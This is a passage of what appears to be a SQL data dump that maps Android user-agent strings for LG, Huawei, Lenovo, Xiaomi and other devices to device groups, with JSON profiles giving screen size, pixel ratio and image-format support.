Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LLD-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LLD-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LLD-L31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-G710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-G710N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-G710VM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-G810) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":857,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-G820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-G850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-K410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-K510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-Q610(FGN)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-Q610.FG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-Q610.FGN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-Q630) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-Q710.FG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-Q710.FGN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-Q720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-Q850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-V350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-V405) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-V409N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X120) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X220) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X410(FG)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X410.FGN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X430) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X525) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LM-X540) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LON-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LYA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LYA-L0C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LYA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Le_Prime) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Le_Spark) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":343,\"screenHeight\":732,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo L18081) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo L19041) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo L38111) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo L39051) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo L78011) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo L78032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo L78051) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo L78071) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo PB-6505Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo TB-8505F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo TB-8505X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo TB-X505F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo TB-X505L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo TB-X605F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo TB-X605L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo TB-X606F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo TB-X705F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo YT-X705F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Lenovo YT-X705L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Live) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":744,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; M12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; M13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; M6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; M7_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX1A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX1B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX1H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX1M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX2J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX3A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX3Am) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAR-LX3Bm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":427,\"screenHeight\":901,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MAX_1_PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MHA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MHA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MHA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 5s Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 6X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 8 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":818,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 8 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":816,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 8 UD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 